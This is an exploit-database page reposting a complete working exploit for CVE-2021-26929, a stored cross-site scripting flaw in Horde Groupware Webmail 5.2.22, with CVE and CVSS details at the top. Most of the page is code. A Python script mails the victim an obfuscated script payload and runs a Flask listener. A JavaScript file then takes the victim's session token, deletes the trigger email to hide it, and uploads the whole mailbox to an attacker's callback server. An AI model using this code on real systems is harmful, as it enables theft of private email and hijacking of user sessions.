Horde Groupware Webmail 5.2.22 Cross Site Scripting
CVE
Category
Price
Severity
CVE-2021-26929
CWE-79
$1,500
High
Author
Risk
Exploitation Type
Date
Egidio Romano
High
Remote
2021-04-15
CPE
cpe:cpe:/a:horde:groupware_webmail:5.2.22
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required Low PR The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources. Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability None A There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040075 Below is a copy:
Horde Groupware Webmail 5.2.22 Cross Site Scripting # Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS
# Author: Alex Birnberg
# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty
# Date: 04.14.2021
# Vendor: https://www.horde.org/apps/webmail
# Link: https://github.com/horde/webmail/releases
# CVE: CVE-2021-26929
[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929
[Exploit Program Code]
#!/usr/bin/python3
# Author idea: Alex Birnberg
# debug nu11secur1ty 2021
import io
import os
import ssl
import sys
import json
import base64
import string
import random
import logging
import smtplib
import sqlite3
import hashlib
import zipfile
import argparse
from flask import Flask, request, Response
from urllib.parse import urlparse
class Exploit:
def __init__(self, args):
# Database
if not os.path.exists('database.db'):
with sqlite3.connect("database.db") as conn:
cursor = conn.cursor()
cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);')
conn.commit()
# SMTP URL
o = urlparse(args.smtp)
self.smtp = {
'ssl': o.scheme.lower() == 'smtps',
'host': o.hostname or '127.0.0.1',
'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'),
'username': '' or o.username,
'password': '' or o.password
}
try:
if self.smtp['ssl']:
context = ssl.create_default_context()
context.verify_mode = ssl.CERT_OPTIONAL
context.check_hostname = False
self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context)
else:
self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port'])
except Exception as e:
print(e)
print('[-] Error connecting to SMTP server!')
exit()
try:
self.server.login(self.smtp['username'], self.smtp['password'])
except:
pass
# Callback URL
o = urlparse(args.callback)
self.callback = {
'url': '{}://{}'.format(o.scheme, o.netloc),
'path': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Listener URL
o = urlparse(args.listener)
self.listener = {
'ssl': o.scheme.lower() == 'https',
'host': o.hostname or '0.0.0.0',
'port': o.port or 80,
'horde': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Target email
self.target = args.target
# Subject
self.subject = args.subject or 'Important Message'
# Environment
self.env = {}
self.env['mailbox'] = args.mailbox or 'INBOX'
self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path'])
def trigger(self):
print('[*] Waiting for emails...')
self.bypass_auth()
print('\n[*] Done')
def bypass_auth(self):
def horde():
f = open('horde.js')
content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read())
f.close()
return content
def callback():
response = Response('')
with sqlite3.connect("database.db") as conn:
try:
if request.files.get('mbox'):
filename = request.files.get('mbox').filename.replace('zip', 'mbox')
content = request.files.get('mbox').stream.read()
zipdata = io.BytesIO()
zipdata.write(content)
content = zipfile.ZipFile(zipdata)
content = content.open(filename).read()
mail_hash = hashlib.sha1(content).digest().hex()
print('[+] Received mailbox ({})'.format(mail_hash))
cursor = conn.cursor()
cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content))
except:
pass
response.headers['Access-Control-Allow-Origin'] = '*'
return response
payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde'])
payload = '<script>eval(atob("{}"))</script>'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target)
# The secret services :)
content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
self.server.sendmail(self.smtp['username'], self.target, content)
app = Flask(__name__)
app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde)
app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST'])
logging.getLogger('werkzeug').setLevel(logging.ERROR)
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
try:
if self.listener['ssl']:
app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem'))
else:
app.run(host=self.listener['host'], port=self.listener['port'])
except:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL')
parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL')
parser.add_argument('--listener', help='Listener URL', metavar='URL')
parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL')
parser.add_argument('--subject', help='Email subject', metavar='SUBJECT')
parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX')
args = parser.parse_args()
exploit = Exploit(args)
exploit.trigger()
horde.js
class Exploit {
constructor() {
this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp'));
}
trigger() {
this.mailbox = this.get_mailbox();
this.buid = this.get_buid();
this.token = this.get_token();
this.auto_delete()
.then(() => {
this.exfiltrate_emails({mailbox: env.mailbox});
});
}
async auto_delete() {
let params = new URLSearchParams()
params.append('token', this.token);
params.append('view', this.mailbox);
params.append('buid', this.buid);
return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', {
method: 'POST',
body: params
})
.then(() => {
let params = new URLSearchParams();
params.append('token', this.token);
params.append('view', this.mailbox);
return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', {
method: 'POST',
body: params
})
.then(() => {
if (document.getElementById('checkmaillink') !== null) {
document.getElementById('checkmaillink').click();
}
});
});
}
async exfiltrate_emails(args) {
let mbox_list = '["' + this.get_mailbox() + '"]';
if (args.mailbox.toUpperCase() != 'INBOX') {
let params = new URLSearchParams();
params.append('reload', '1');
params.append('unsub', '1');
params.append('token', this.token);
let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', {
method: 'POST',
body: params
})
.then(response => {
return response.text();
})
.then(data => {
return JSON.parse(data.substring(10, data.length - 2));
});
mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => {
if (mailbox.l.toUpperCase() == args.mailbox) {
if (mbox_list === undefined) {
mbox_list = '["' + mailbox.m + '"]';
}
}
});
}
let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/')
.then(response => {
return [response.blob(), response.headers.get('Content-Disposition')];
});
let filename = zip[1];
filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1);
zip = await zip[0];
let formData = new FormData();
formData.append('mbox', zip, filename);
fetch(window.env.callback, {
method: 'POST',
body: formData
});
}
get_token() {
let link;
let token;
if (document.getElementsByClassName('smartmobile-logout').length > 0) {
link = document.getElementsByClassName('smartmobile-logout')[0].href;
}
else if (document.getElementById('horde-logout') !== null) {
link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href;
}
else {
link = location.href;
}
if (link.match('horde_logout_token=(.*)&') !== null) {
token = link.match('horde_logout_token=(.*)&')[1];
}
if (token === undefined && link.match('token=(.*)&') !== null) {
token = link.match('token=(.*)&')[1];
}
return token;
}
get_mailbox() {
if (window.DimpBase !== undefined) {
return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({
VP_id: {
equal: [ DimpBase.pp.VP_id ]
}
}).get('dataob').first().VP_view;
}
else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mailbox=([A-Za-z0-9]*)')[1];
}
else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mbox=([A-Za-z0-9]*)')[1];
}
}
get_buid() {
if (location.href.match('buid=([0-9]*)') !== null) {
return location.href.match('buid=([0-9]*)')[1];
}
else if (location.href.match(';([0-9]*)') !== null) {
return location.href.match(';([0-9]*)')[1];
}
}
}
const exploit = new Exploit();
exploit.trigger();
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use .